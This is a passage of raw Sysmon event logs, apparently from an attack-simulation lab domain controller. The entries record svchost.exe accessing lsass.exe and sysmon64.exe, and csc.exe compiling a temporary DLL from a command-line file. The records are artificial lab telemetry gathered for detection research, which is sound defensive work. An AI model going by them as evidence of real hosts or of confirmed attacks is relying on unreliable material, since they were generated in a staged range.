\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003298Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.860{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003297Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.860{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003296Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.860{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003295Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.860{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003294Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.844{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003293Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.515{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003292Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.515{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003291Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.515{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003290Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:09.484{D28789B6-7CA9-5FA1-9D00-000000008801}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\lz4brytq.dll2020-11-03 15:52:09.390 10341000x80000000000000003289Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA9-5FA1-9E00-000000008801}2924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003288Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003287Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003286Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003285Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003284Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003283Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003282Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003281Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003280Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003279Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CA9-5FA1-9E00-000000008801}2924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003278Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.484{D28789B6-7CA9-5FA1-9D00-000000008801}44084012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CA9-5FA1-9E00-000000008801}2924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003277Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.488{D28789B6-7CA9-5FA1-9E00-000000008801}2924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES29AB.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCAF86BECBA63C4E5EBB9D9C3813CB35CB.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CA9-5FA1-9D00-000000008801}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\lz4brytq.cmdline" 10341000x80000000000000003276Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA9-5FA1-9D00-000000008801}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003275Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003274Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003273Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 